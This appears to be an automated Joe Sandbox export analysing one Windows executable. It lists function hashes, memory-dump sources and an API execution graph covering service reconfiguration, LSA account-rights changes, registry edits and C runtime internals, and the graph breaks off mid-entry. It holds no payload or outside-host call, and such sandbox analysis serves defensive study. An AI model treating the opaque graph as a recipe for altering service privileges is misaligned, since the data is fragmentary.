                                                    • Opcode ID: 901adaa85fb6a5a64b023c28a50e0534b3bb249fc2f2a9c113e815f6bb73f028
                                                    • Instruction ID: b0fcfc9cf733b5e84ca0b8e95cea4546bd727dda41900d12ab222a224a7e6489
                                                    • Opcode Fuzzy Hash: 901adaa85fb6a5a64b023c28a50e0534b3bb249fc2f2a9c113e815f6bb73f028
                                                    • Instruction Fuzzy Hash: 720146B4D042149ACF34DF62C440AEFB7B5AF10399FA4442FE442963A1CB389AD1CB5D
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00410C7B,?), ref: 00410AB3
                                                    • GetLastError.KERNEL32(?), ref: 00410ABF
                                                      • Part of subcall function 00406381: __vswprintf_c_l.LIBCMT ref: 0040639F
                                                    Strings
                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410AC8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                    • API String ID: 1091760877-2248577382
                                                    • Opcode ID: 07d0bb2500cb9ccda4064a11293933eb64a3c7203a3996a6424fcf81e7c2c8f7
                                                    • Instruction ID: d29c7ddd4567ab334f719f964539e6a162cdf623e087f48c6918d4cfc55fb95b
                                                    • Opcode Fuzzy Hash: 07d0bb2500cb9ccda4064a11293933eb64a3c7203a3996a6424fcf81e7c2c8f7
                                                    • Instruction Fuzzy Hash: 0CD0C731A085207BCA013B28AC0A99E34048B11330BA1073AF932612E2DB690AA242AE

                                                    Execution Graph

                                                    Execution Coverage:4.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:6.6%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:53
                                                    execution_graph 11470 40a9c0 11471 412731 __snwprintf_s 101 API calls 11470->11471 11472 40a9ff 11471->11472 11473 40aa06 11472->11473 11474 40aa3c RegCreateKeyExW 11472->11474 11477 405400 3 API calls 11473->11477 11475 40aa67 GetLastError 11474->11475 11476 40aaa8 11474->11476 11479 4052c0 107 API calls 11475->11479 11482 40aab9 RegCloseKey 11476->11482 11483 40aadb RegSetValueExW 11476->11483 11478 40aa1e 11477->11478 11480 412cdc __except_handler4 5 API calls 11478->11480 11481 40aa75 11479->11481 11484 40aa35 11480->11484 11485 405400 3 API calls 11481->11485 11489 412cdc __except_handler4 5 API calls 11482->11489 11483->11482 11487 40aafa GetLastError 11483->11487 11488 40aa8a 11485->11488 11490 4052c0 107 API calls 11487->11490 11491 412cdc __except_handler4 5 API calls 11488->11491 11492 40ab62 11489->11492 11493 40ab08 11490->11493 11494 40aaa1 11491->11494 11495 405400 3 API calls 11493->11495 11496 40ab1d RegCloseKey 11495->11496 11497 412cdc __except_handler4 5 API calls 11496->11497 11498 40ab3f 11497->11498 13292 41644b 13294 416457 __mtinitlocknum 13292->13294 13293 41646f 13296 41647d 13293->13296 13298 414190 __mtinitlocknum 67 API calls 13293->13298 13294->13293 13295 414190 __mtinitlocknum 67 API calls 13294->13295 13297 416559 __mtinitlocknum 13294->13297 13295->13293 13299 414190 __mtinitlocknum 67 API calls 13296->13299 13300 41648b 13296->13300 13298->13296 13299->13300 13301 414190 __mtinitlocknum 67 API calls 13300->13301 13302 416499 13300->13302 13301->13302 13303 4164a7 13302->13303 13304 414190 __mtinitlocknum 67 API calls 13302->13304 13305 4164b5 13303->13305 13306 414190 __mtinitlocknum 67 API calls 13303->13306 13304->13303 13307 4164c3 13305->13307 13308 414190 __mtinitlocknum 67 API calls 13305->13308 13306->13305 13309 4164d4 13307->13309 13310 414190 __mtinitlocknum 67 API calls 13307->13310 13308->13307 13311 4145cc __lock 67 API calls 13309->13311 13310->13309 13312 4164dc 13311->13312 13313 416501 13312->13313 13314 4164e8 InterlockedDecrement 13312->13314 13328 416565 13313->13328 13314->13313 13315 4164f3 13314->13315 13315->13313 13318 414190 __mtinitlocknum 67 API calls 13315->13318 13318->13313 13319 4145cc __lock 67 API calls 13320 416515 13319->13320 13321 416546 13320->13321 13323 41601d ___removelocaleref 8 API calls 13320->13323 13331 416571 13321->13331 13326 41652a 13323->13326 13325 414190 __mtinitlocknum 67 API calls 13325->13297 13326->13321 13327 415e45 ___freetlocinfo 67 API calls 13326->13327 13327->13321 13334 4144f2 LeaveCriticalSection 13328->13334 13330 41650e 13330->13319 13335 4144f2 LeaveCriticalSection 13331->13335 13333 416553 13333->13325 13334->13330 13335->13333 9970 40ec60 9971 40ec6f 9970->9971 9972 40ec78 9970->9972 9973 40ecde 9972->9973 10070 412731 9972->10070 9975 40ecf0 9973->9975 9976 40ed1c 9973->9976 10073 401580 9975->10073 10021 401790 9976->10021 9979 40ed01 9979->9976 9981 40edbe 9979->9981 9980 40ed36 9982 40ed41 ChangeServiceConfigW 9980->9982 10037 4017f0 9980->10037 9987 40ee03 9982->9987 9988 40ed87 9982->9988 9984 40edd8 9984->9982 9986 40ede3 9984->9986 9989 40edeb GetProcessHeap HeapFree 9986->9989 10001 40edb0 __flswbuf 9986->10001 9992 40ee17 9987->9992 9993 40ee07 GetProcessHeap HeapFree 9987->9993 9990 40ed9b GetLastError 9988->9990 9991 40ed8b GetProcessHeap HeapFree 9988->9991 9989->10001 10098 4052c0 TlsGetValue 9990->10098 9991->9990 9995 40ee20 9992->9995 9996 40ee3e 9992->9996 9993->9992 10107 40ce10 9995->10107 10002 40ee69 ChangeServiceConfig2W 9996->10002 10169 40d4c0 9996->10169 9997 40eda7 9997->10001 10031 405470 10001->10031 10004 40ee91 GetLastError 10002->10004 10005 40eebb 10002->10005 10003 40ee66 10003->10002 10004->10005 10007 40ee9c 10004->10007 10008 40eeb8 10005->10008 10009 40eefe 10005->10009 10010 4052c0 107 API calls 10007->10010 10008->10005 10182 40b700 10008->10182 10012 40eea4 10010->10012 10178 405400 RegisterEventSourceW 10012->10178 10013 40eecb 10015 40eed2 __flswbuf 10013->10015 10016 40eef5 10013->10016 10019 405470 109 API calls 10015->10019 10356 40e450 ChangeServiceConfig2W 10016->10356 10020 40eee5 10019->10020 10022 4017a0 10021->10022 10023 401799 10021->10023 10363 4097b0 10022->10363 10023->9980 10025 4017ab 10025->10023 10368 401560 10025->10368 10028 4017c4 10028->9980 10030 4017d3 FreeSid 10030->9980 10951 405370 GetUserDefaultLangID FormatMessageW 10031->10951 10033 40547b 10034 40549e 10033->10034 10957 412e2d 10033->10957 10034->9981 10038 401803 10037->10038 10039 4017fc 10037->10039 10040 401000 117 API calls 10038->10040 10039->9984 10041 40180d 10040->10041 10042 401814 10041->10042 10043 4010c0 156 API calls 10041->10043 10042->9984 10044 40182e 10043->10044 10045 401835 LsaClose 10044->10045 10046 401849 10044->10046 10045->9984 10047 401070 2 API calls 10046->10047 10048 401854 10047->10048 10049 401870 LsaEnumerateAccountRights 10048->10049 10050 40185b LsaClose 10048->10050 10052 4018c5 LsaNtStatusToWinError 10049->10052 10060 401910 10049->10060 10050->9984 10053 4018d2 FreeSid LsaClose 10052->10053 10052->10060 10057 4052c0 107 API calls 10053->10057 10054 401952 LsaFreeMemory LsaAddAccountRights FreeSid LsaClose 10055 401981 LsaNtStatusToWinError 10054->10055 10056 4019d7 __flswbuf 10054->10056 10058 4052c0 107 API calls 10055->10058 10063 405470 109 API calls 10056->10063 10059 4018e9 __flswbuf 10057->10059 10061 40198d __flswbuf 10058->10061 10064 405470 109 API calls 10059->10064 10060->10054 10062 412c36 __wcsnicmp 79 API calls 10060->10062 10066 4019b3 FreeSid LsaFreeMemory LsaClose 10060->10066 10067 405470 109 API calls 10061->10067 10062->10060 10065 4019eb 10063->10065 10068 401901 10064->10068 10065->9984 10066->9984 10069 4019a4 10067->10069 10068->9984 10069->9984 11171 412f44 10070->11171 10074 401000 117 API calls 10073->10074 10075 40158d 10074->10075 10076 401594 10075->10076 10077 4010c0 156 API calls 10075->10077 10076->9979 10078 4015b1 10077->10078 10079 4015c1 LsaLookupSids 10078->10079 10080 4015b8 10078->10080 10081 4015eb LsaFreeMemory LsaFreeMemory LsaNtStatusToWinError 10079->10081 10082 40162f GetProcessHeap HeapAlloc 10079->10082 10080->9979 10083 4052c0 107 API calls 10081->10083 10084 4016b2 10082->10084 10085 401675 LsaFreeMemory LsaFreeMemory 10082->10085 10086 40160b __flswbuf 10083->10086 10088 412760 ___sbh_free_block __VEC_memcpy 10084->10088 10087 40169d __flswbuf 10085->10087 10093 405470 109 API calls 10086->10093 10091 405470 109 API calls 10087->10091 10089 4016c0 10088->10089 10090 412760 ___sbh_free_block __VEC_memcpy 10089->10090 10092 4016d2 10090->10092 10094 4016a6 10091->10094 10095 412760 ___sbh_free_block __VEC_memcpy 10092->10095 10096 401622 10093->10096 10094->9979 10097 4016ec LsaFreeMemory LsaFreeMemory 10095->10097 10096->9979 10097->9979 10099 4052d3 LocalAlloc 10098->10099 10100 4052fb GetUserDefaultLangID FormatMessageW 10098->10100 10101 4052e6 10099->10101 10102 4052ed TlsSetValue 10099->10102 10103 405327 FormatMessageW 10100->10103 10104 40534f 10100->10104 10101->9997 10102->10100 10103->10104 10105 40533c 10103->10105 10104->9997 10106 412731 __snwprintf_s 101 API calls 10105->10106 10106->10104 10108 40d20d ChangeServiceConfigW 10107->10108 10109 40ce4d 10107->10109 10110 40d233 10108->10110 10111 40d2cc 10108->10111 10109->10108 11276 40ca70 OpenSCManagerW 10109->11276 10113 40d246 GetLastError 10110->10113 10114 40d237 GetProcessHeap HeapFree 10110->10114 10115 40ce7b 10111->10115 10116 40d2d0 GetProcessHeap HeapFree 10111->10116 10118 4052c0 107 API calls 10113->10118 10114->10113 10119 412cdc __except_handler4 5 API calls 10115->10119 10116->10115 10121 40d252 __flswbuf 10118->10121 10122 40d2f4 10119->10122 10120 40ce68 __flswbuf 10126 405470 109 API calls 10120->10126 10125 405470 109 API calls 10121->10125 10122->9981 10122->9996 10123 40d064 GetProcessHeap HeapAlloc 10124 40d1e6 10123->10124 10162 40d08c 10123->10162 10127 40d202 CloseServiceHandle 10124->10127 10128 40d1f2 GetProcessHeap HeapFree 10124->10128 10125->10115 10126->10115 10127->10108 10128->10127 10129 40ce86 10129->10123 10134 40ced7 RegOpenKeyExW 10129->10134 10130 40d0d5 GetProcessHeap HeapFree 10132 40d0f1 GetProcessHeap HeapFree 10130->10132 10133 40d0f9 10130->10133 10132->10133 10138 4052c0 107 API calls 10133->10138 10135 40cef7 GetLastError 10134->10135 10136 40cf2c RegQueryValueExW 10134->10136 10140 4052c0 107 API calls 10135->10140 10143 40cf54 GetProcessHeap HeapAlloc 10136->10143 10144 40d00b 10136->10144 10137 4097b0 79 API calls 10137->10162 10145 40d103 __flswbuf 10138->10145 10139 40d271 GetProcessHeap HeapFree 10141 40d295 CloseServiceHandle 10139->10141 10142 40d28d GetProcessHeap HeapFree 10139->10142 10146 40cf03 __flswbuf 10140->10146 10147 4052c0 107 API calls 10141->10147 10142->10141 10150 40cf95 RegQueryValueExW 10143->10150 10151 40cf6d __flswbuf 10143->10151 10148 40d010 GetLastError 10144->10148 10149 40d055 RegCloseKey 10144->10149 10157 413b96 _fwprintf 103 API calls 10145->10157 11280 413b96 10146->11280 10153 40d2aa __flswbuf 10147->10153 10154 4052c0 107 API calls 10148->10154 10149->10123 10150->10149 10155 40cfb6 GetLastError 10150->10155 10161 405470 109 API calls 10151->10161 10152 412760 __VEC_memcpy ___sbh_free_block 10152->10162 10163 413b96 _fwprintf 103 API calls 10153->10163 10158 40d01c __flswbuf 10154->10158 10156 4052c0 107 API calls 10155->10156 10159 40cfc2 __flswbuf 10156->10159 10157->10115 10165 413b96 _fwprintf 103 API calls 10158->10165 10166 413b96 _fwprintf 103 API calls 10159->10166 10161->10115 10162->10124 10162->10130 10162->10137 10162->10139 10162->10152 10164 412731 __snwprintf_s 101 API calls 10162->10164 11295 40cab0 OpenServiceW 10162->11295 10163->10115 10164->10162 10167 40d03d RegCloseKey 10165->10167 10168 40cfe3 GetProcessHeap HeapFree RegCloseKey 10166->10168 10167->10115 10168->10115 10170 40d4c8 ChangeServiceConfig2W 10169->10170 10172 40d4f0 10170->10172 10173 40d4f3 GetLastError 10170->10173 10172->10003 10174 4052c0 107 API calls 10173->10174 10175 40d501 10174->10175 10176 405400 3 API calls 10175->10176 10177 40d516 10176->10177 10177->10003 10179 405466 10178->10179 10180 405417 ReportEventW DeregisterEventSource 10178->10180 10179->10008 10180->10179 11328 40b440 10182->11328 10185 40b71e 10185->10013 10188 40b75e 10190 40af10 112 API calls 10188->10190 10189 40b73e RegDeleteKeyW RegCloseKey 10189->10013 10191 40b770 10190->10191 10192 40b797 10191->10192 10193 40b777 RegDeleteKeyW RegCloseKey 10191->10193 10194 40af10 112 API calls 10192->10194 10193->10013 10195 40b7a9 10194->10195 10196 40b7d0 10195->10196 10197 40b7b0 RegDeleteKeyW RegCloseKey 10195->10197 10198 40b7e2 10196->10198 10199 40b7f3 10196->10199 10197->10013 11334 40af30 RegSetValueExW 10198->11334 10201 40b7ee 10199->10201 10202 40b7fa RegDeleteValueW 10199->10202 10203 40b8c1 10201->10203 10204 40b818 10201->10204 10202->10201 10205 40b8d0 10203->10205 10206 40b8c8 RegDeleteValueW 10203->10206 11341 40c610 10204->11341 10209 40b8dc 10205->10209 10210 40b8ed 10205->10210 10206->10205 10208 40b824 10215 40b83f RegSetValueExW 10208->10215 10219 40b8a1 10208->10219 10211 40af30 112 API calls 10209->10211 10212 40b8f4 RegDeleteValueW 10210->10212 10213 40b8e8 10210->10213 10211->10213 10212->10213 10221 40b91a 10213->10221 11351 40a9c0 10213->11351 10214 40b8af GetProcessHeap HeapFree 10214->10205 10215->10219 10220 40b85d GetLastError 10215->10220 10217 40b927 10222 40af30 112 API calls 10217->10222 10218 40b938 10223 40b933 10218->10223 10224 40b93f RegDeleteValueW 10218->10224 10219->10205 10219->10214 10225 4052c0 107 API calls 10220->10225 10221->10217 10221->10218 10222->10223 10226 40b954 10223->10226 10227 40b965 10223->10227 10224->10223 10231 40b86b 10225->10231 10228 40af30 112 API calls 10226->10228 10229 40b960 10227->10229 10230 40b96c RegDeleteValueW 10227->10230 10228->10229 10232 40b981 10229->10232 10233 40b992 10229->10233 10230->10229 10234 405400 3 API calls 10231->10234 10235 40af30 112 API calls 10232->10235 10237 40b98d 10233->10237 10238 40b999 RegDeleteValueW 10233->10238 10236 40b880 GetProcessHeap HeapFree 10234->10236 10235->10237 10236->10013 10239 40b9ae 10237->10239 10240 40b9bf 10237->10240 10238->10237 10241 40af30 112 API calls 10239->10241 10242 40b9c6 RegDeleteValueW 10240->10242 10243 40b9ba 10240->10243 10241->10243 10242->10243 10244 40b9db 10243->10244 10245 40b9ec 10243->10245 10246 40af30 112 API calls 10244->10246 10247 40b9f3 RegDeleteValueW 10245->10247 10248 40b9e7 10245->10248 10246->10248 10247->10248 10249 40ba1c 10248->10249 10250 40bad0 10248->10250 10253 40ba2d 10248->10253 10251 40af10 112 API calls 10249->10251 10252 40bb10 10250->10252 10255 40bbc4 10250->10255 10259 40bb21 10250->10259 10254 40ba28 10251->10254 10256 40af10 112 API calls 10252->10256 10253->10254 10257 40ba34 RegDeleteValueW 10253->10257 10261 40ba47 10254->10261 10262 40ba5d 10254->10262 10258 40bc04 10255->10258 10265 40bcb8 10255->10265 10273 40bc15 10255->10273 10260 40bb1c 10256->10260 10257->10254 10266 40af10 112 API calls 10258->10266 10259->10260 10267 40bb28 RegDeleteValueW 10259->10267 10275 40bb51 10260->10275 10276 40bb3b 10260->10276 11380 408750 10261->11380 10264 40ba58 10262->10264 11393 4087e0 10262->11393 10269 40ba82 10264->10269 10270 40ba98 10264->10270 10271 40bce0 10265->10271 10272 40bcf2 10265->10272 10274 40bc10 10266->10274 10267->10260 10279 408750 112 API calls 10269->10279 10281 40ba93 10270->10281 10288 4087e0 105 API calls 10270->10288 10280 40af30 112 API calls 10271->10280 10282 40bced 10272->10282 10283 40bcf9 RegDeleteValueW 10272->10283 10273->10274 10284 40bc1c RegDeleteValueW 10273->10284 10293 40bc45 10274->10293 10294 40bc2f 10274->10294 10278 40bb4c 10275->10278 10285 4087e0 105 API calls 10275->10285 10277 408750 112 API calls 10276->10277 10277->10278 10286 40bb76 10278->10286 10287 40bb8c 10278->10287 10279->10281 10280->10282 10291 40bad5 10281->10291 10292 40babf 10281->10292 10289 40bd0a 10282->10289 10290 40bd1c 10282->10290 10283->10282 10284->10274 10285->10278 10299 408750 112 API calls 10286->10299 10300 40bb87 10287->10300 10308 4087e0 105 API calls 10287->10308 10288->10281 10302 40af30 112 API calls 10289->10302 10296 40bd23 RegDeleteValueW 10290->10296 10297 40bd17 10290->10297 10291->10250 10311 4087e0 105 API calls 10291->10311 10301 408750 112 API calls 10292->10301 10298 40bc40 10293->10298 10305 4087e0 105 API calls 10293->10305 10295 408750 112 API calls 10294->10295 10295->10298 10296->10297 10303 40bd35 10297->10303 10304 40bd46 10297->10304 10306 40bc80 10298->10306 10307 40bc6a 10298->10307 10299->10300 10309 40bbb3 10300->10309 10310 40bbc9 10300->10310 10301->10250 10302->10297 10312 40af30 112 API calls 10303->10312 10313 40bd41 10304->10313 10314 40bd4d RegDeleteValueW 10304->10314 10305->10298 10316 40bc7b 10306->10316 10320 4087e0 105 API calls 10306->10320 10315 408750 112 API calls 10307->10315 10308->10300 10317 408750 112 API calls 10309->10317 10310->10255 10323 4087e0 105 API calls 10310->10323 10311->10250 10312->10313 10318 40bd70 10313->10318 10319 40bd5f 10313->10319 10314->10313 10315->10316 10321 40bca7 10316->10321 10322 40bcbd 10316->10322 10317->10255 10325 40bd77 RegDeleteValueW 10318->10325 10326 40bd6b 10318->10326 10324 40af30 112 API calls 10319->10324 10320->10316 10327 408750 112 API calls 10321->10327 10322->10265 10330 4087e0 105 API calls 10322->10330 10323->10255 10324->10326 10325->10326 10328 40bd89 10326->10328 10329 40bd9a 10326->10329 10327->10265 10331 40af30 112 API calls 10328->10331 10332 40bda1 RegDeleteValueW 10329->10332 10333 40bd95 10329->10333 10330->10265 10331->10333 10332->10333 10334 40bdb2 10333->10334 10335 40bdc4 10333->10335 10336 40af30 112 API calls 10334->10336 10337 40bdbf 10335->10337 10338 40bdcb RegDeleteValueW 10335->10338 10336->10337 10339 40bde3 RegSetValueExW 10337->10339 10340 40be25 10337->10340 10338->10337 10341 40be20 10339->10341 10343 40be01 GetLastError 10339->10343 10340->10341 10342 40be2c RegDeleteValueW 10340->10342 10344 40be90 10341->10344 10345 40be42 RegSetValueExW 10341->10345 10342->10341 10346 4052c0 107 API calls 10343->10346 10348 40bea3 RegCloseKey 10344->10348 10349 40be97 RegDeleteValueW 10344->10349 10347 40be60 GetLastError 10345->10347 10345->10348 10350 40be0b 10346->10350 10351 4052c0 107 API calls 10347->10351 10348->10013 10349->10348 10352 405400 3 API calls 10350->10352 10353 40be6a 10351->10353 10352->10341 10354 405400 3 API calls 10353->10354 10355 40be7f RegCloseKey 10354->10355 10355->10013 10357 40e49d 10356->10357 10358 40e476 GetLastError 10356->10358 10357->10009 10358->10357 10359 40e481 10358->10359 10360 4052c0 107 API calls 10359->10360 10361 40e489 10360->10361 10362 405400 3 API calls 10361->10362 10362->10357 10364 4097c0 10363->10364 10365 4097f4 10364->10365 10378 412c36 10364->10378 10365->10025 10860 4010c0 10368->10860 10370 401571 10370->10028 10371 401070 10370->10371 10372 401079 10371->10372 10373 40107a 10371->10373 10372->10030 10374 401088 10373->10374 10375 40108f IsWellKnownSid 10373->10375 10374->10030 10376 4010a3 IsWellKnownSid 10375->10376 10377 40109c 10375->10377 10376->10030 10377->10030 10379 412c47 10378->10379 10380 412cc6 10378->10380 10385 409801 10379->10385 10386 4154f0 10379->10386 10392 412b4c 10380->10392 10385->10025 10403 4163b8 GetLastError 10386->10403 10388 412c5e 10389 415488 10388->10389 10390 4161e5 __decode_pointer 6 API calls 10389->10390 10391 415498 __invoke_watson 10390->10391 10393 412b64 10392->10393 10400 412b80 10392->10400 10394 412b6b 10393->10394 10396 412b94 10393->10396 10395 4154f0 __mtinitlocknum 67 API calls 10394->10395 10397 412b70 10395->10397 10644 412ac5 10396->10644 10399 415488 _strcpy_s 6 API calls 10397->10399 10399->10400 10400->10385 10401 416707 79 API calls __towlower_l 10402 412b9f 10401->10402 10402->10400 10402->10401 10417 416260 TlsGetValue 10403->10417 10406 416425 SetLastError 10406->10388 10411 416404 10438 4162d1 10411->10438 10412 41641c 10456 414190 10412->10456 10415 41640c GetCurrentThreadId 10415->10406 10416 416422 10416->10406 10418 416290 10417->10418 10419 416275 10417->10419 10418->10406 10422 4140f6 10418->10422 10420 4161e5 __decode_pointer 6 API calls 10419->10420 10421 416280 TlsSetValue 10420->10421 10421->10418 10424 4140ff 10422->10424 10425 41413c 10424->10425 10426 41411d Sleep 10424->10426 10469 418ceb 10424->10469 10425->10406 10428 4161e5 TlsGetValue 10425->10428 10427 414132 10426->10427 10427->10424 10427->10425 10429 4161fd 10428->10429 10430 41621e GetModuleHandleW 10428->10430 10429->10430 10431 416207 TlsGetValue 10429->10431 10432 416239 GetProcAddress 10430->10432 10433 41622e 10430->10433 10436 416212 10431->10436 10435 416216 10432->10435 10604 413679 10433->10604 10435->10411 10435->10412 10436->10430 10436->10435 10608 416a78 10438->10608 10440 4162dd GetModuleHandleW 10441 4162ed 10440->10441 10446 4162f3 10440->10446 10442 413679 __crt_waiting_on_module_handle 2 API calls 10441->10442 10442->10446 10443 41630b GetProcAddress GetProcAddress 10444 41632f 10443->10444 10445 4145cc __lock 63 API calls 10444->10445 10447 41634e InterlockedIncrement 10445->10447 10446->10443 10446->10444 10609 4163a6 10447->10609 10450 4145cc __lock 63 API calls 10451 41636f 10450->10451 10612 415f8e InterlockedIncrement 10451->10612 10453 41638d 10624 4163af 10453->10624 10455 41639a __mtinitlocknum 10455->10415 10457 41419c __mtinitlocknum 10456->10457 10458 4141db 10457->10458 10460 4145cc __lock 65 API calls 10457->10460 10461 414215 __dosmaperr __mtinitlocknum 10457->10461 10459 4141f0 HeapFree 10458->10459 10458->10461 10459->10461 10462 414202 10459->10462 10465 4141b3 ___sbh_find_block 10460->10465 10461->10416 10463 4154f0 __mtinitlocknum 65 API calls 10462->10463 10464 414207 GetLastError 10463->10464 10464->10461 10466 4141cd 10465->10466 10629 419054 10465->10629 10636 4141e6 10466->10636 10470 418cf7 __mtinitlocknum 10469->10470 10471 418d0f 10470->10471 10481 418d2e _memset 10470->10481 10472 4154f0 __mtinitlocknum 66 API calls 10471->10472 10473 418d14 10472->10473 10474 415488 _strcpy_s 6 API calls 10473->10474 10478 418d24 __mtinitlocknum 10474->10478 10475 418da0 HeapAlloc 10475->10481 10478->10424 10481->10475 10481->10478 10482 4145cc 10481->10482 10489 419803 10481->10489 10495 418de7 10481->10495 10498 418596 10481->10498 10483 4145e1 10482->10483 10484 4145f4 EnterCriticalSection 10482->10484 10501 414509 10483->10501 10484->10481 10486 4145e7 10486->10484 10527 4136a9 10486->10527 10492 419831 10489->10492 10490 4198ca 10494 4198d3 10490->10494 10599 41941a 10490->10599 10492->10490 10492->10494 10592 41936a 10492->10592 10494->10481 10603 4144f2 LeaveCriticalSection 10495->10603 10497 418dee 10497->10481 10499 4161e5 __decode_pointer 6 API calls 10498->10499 10500 4185a6 10499->10500 10500->10481 10502 414515 __mtinitlocknum 10501->10502 10503 41453b 10502->10503 10534 417dfe 10502->10534 10511 41454b __mtinitlocknum 10503->10511 10580 4140b1 10503->10580 10509 41455d 10513 4154f0 __mtinitlocknum 67 API calls 10509->10513 10510 41456c 10514 4145cc __lock 67 API calls 10510->10514 10511->10486 10512 414531 10577 4136fd 10512->10577 10513->10511 10516 414573 10514->10516 10517 4145a7 10516->10517 10518 41457b 10516->10518 10519 414190 __mtinitlocknum 67 API calls 10517->10519 10585 418527 10518->10585 10526 414598 10519->10526 10521 414586 10523 414190 __mtinitlocknum 67 API calls 10521->10523 10521->10526 10524 414592 10523->10524 10525 4154f0 __mtinitlocknum 67 API calls 10524->10525 10525->10526 10589 4145c3 10526->10589 10528 417dfe __FF_MSGBANNER 67 API calls 10527->10528 10529 4136b3 10528->10529 10530 417c53 __NMSG_WRITE 67 API calls 10529->10530 10531 4136bb 10530->10531 10532 4161e5 __decode_pointer 6 API calls 10531->10532 10533 4136c6 10532->10533 10533->10484 10535 41bc72 __set_error_mode 67 API calls 10534->10535 10536 417e05 10535->10536 10538 41bc72 __set_error_mode 67 API calls 10536->10538 10539 417e12 10536->10539 10537 417c53 __NMSG_WRITE 67 API calls 10540 417e2a 10537->10540 10538->10539 10539->10537 10541 41452a 10539->10541 10542 417c53 __NMSG_WRITE 67 API calls 10540->10542 10543 417c53 10541->10543 10542->10541 10544 417c67 10543->10544 10545 41bc72 __set_error_mode 64 API calls 10544->10545 10576 417dc2 10544->10576 10546 417c89 10545->10546 10547 417dc7 GetStdHandle 10546->10547 10548 41bc72 __set_error_mode 64 API calls 10546->10548 10549 417dd5 _strlen 10547->10549 10547->10576 10550 417c9a 10548->10550 10552 417dee WriteFile 10549->10552 10549->10576 10550->10547 10551 417cac 10550->10551 10553 41b46b _strcpy_s 64 API calls 10551->10553 10551->10576 10552->10576 10554 417cce 10553->10554 10555 417ce2 GetModuleFileNameA 10554->10555 10556 415360 __invoke_watson 10 API calls 10554->10556 10557 417d00 10555->10557 10561 417d23 _strlen 10555->10561 10558 417cdf 10556->10558 10559 41b46b _strcpy_s 64 API calls 10557->10559 10558->10555 10560 417d10 10559->10560 10560->10561 10563 415360 __invoke_watson 10 API calls 10560->10563 10562 417d66 10561->10562 10566 41b3b6 __NMSG_WRITE 64 API calls 10561->10566 10564 41b2fb _strcat_s 64 API calls 10562->10564 10563->10561 10565 417d79 10564->10565 10567 417d8a 10565->10567 10569 415360 __invoke_watson 10 API calls 10565->10569 10568 417d53 10566->10568 10570 41b2fb _strcat_s 64 API calls 10567->10570 10568->10562 10572 415360 __invoke_watson 10 API calls 10568->10572 10569->10567 10571 417d9e 10570->10571 10573 415360 __invoke_watson 10 API calls 10571->10573 10575 417daf 10571->10575 10572->10562 10573->10575 10574 41bb09 ___crtMessageBoxW 16 API calls 10574->10576 10575->10574 10576->10512 10578 4136d2 ___crtCorExitProcess GetModuleHandleW GetProcAddress 10577->10578 10579 41370a ExitProcess 10578->10579 10582 4140ba 10580->10582 10581 418c21 _malloc 66 API calls 10581->10582 10582->10581 10583 4140f0 10582->10583 10584 4140d1 Sleep 10582->10584 10583->10509 10583->10510 10584->10582 10586 416a78 __mtinitlocknum 10585->10586 10587 418533 InitializeCriticalSectionAndSpinCount 10586->10587 10588 418577 __mtinitlocknum 10587->10588 10588->10521 10590 4144f2 _doexit LeaveCriticalSection 10589->10590 10591 4145ca 10590->10591 10591->10511 10593 4193b1 HeapAlloc 10592->10593 10594 41937d HeapReAlloc 10592->10594 10596 4193d4 VirtualAlloc 10593->10596 10597 41939b 10593->10597 10595 41939f 10594->10595 10594->10597 10595->10593 10596->10597 10598 4193ee HeapFree 10596->10598 10597->10490 10598->10597 10600 419431 VirtualAlloc 10599->10600 10602 419478 10600->10602 10602->10494 10603->10497 10605 413684 Sleep GetModuleHandleW 10604->10605 10606 4136a2 10605->10606 10607 4136a6 10605->10607 10606->10605 10606->10607 10607->10432 10607->10435 10608->10440 10627 4144f2 LeaveCriticalSection 10609->10627 10611 416368 10611->10450 10613 415fac InterlockedIncrement 10612->10613 10614 415faf 10612->10614 10613->10614 10615 415fb9 InterlockedIncrement 10614->10615 10616 415fbc 10614->10616 10615->10616 10617 415fc6 InterlockedIncrement 10616->10617 10618 415fc9 10616->10618 10617->10618 10619 415fd3 InterlockedIncrement 10618->10619 10620 415fd6 10618->10620 10619->10620 10621 415fef InterlockedIncrement 10620->10621 10622 415fff InterlockedIncrement 10620->10622 10623 41600a InterlockedIncrement 10620->10623 10621->10620 10622->10620 10623->10453 10628 4144f2 LeaveCriticalSection 10624->10628 10626 4163b6 10626->10455 10627->10611 10628->10626 10630 419093 10629->10630 10635 419335 10629->10635 10631 41927f VirtualFree 10630->10631 10630->10635 10632 4192e3 10631->10632 10633 4192f2 VirtualFree HeapFree 10632->10633 10632->10635 10639 412760 10633->10639 10635->10466 10643 4144f2 LeaveCriticalSection 10636->10643 10638 4141ed 10638->10458 10640 412778 10639->10640 10641 41279f __VEC_memcpy 10640->10641 10642 4127a7 10640->10642 10641->10642 10642->10635 10643->10638 10645 412ad8 10644->10645 10649 412b25 10644->10649 10652 416431 10645->10652 10648 412b05 10648->10649 10672 415988 10648->10672 10649->10402 10653 4163b8 __getptd_noexit 67 API calls 10652->10653 10654 416439 10653->10654 10655 412add 10654->10655 10656 4136a9 __amsg_exit 67 API calls 10654->10656 10655->10648 10657 4160f4 10655->10657 10656->10655 10658 416100 __mtinitlocknum 10657->10658 10659 416431 __getptd 67 API calls 10658->10659 10660 416105 10659->10660 10661 416133 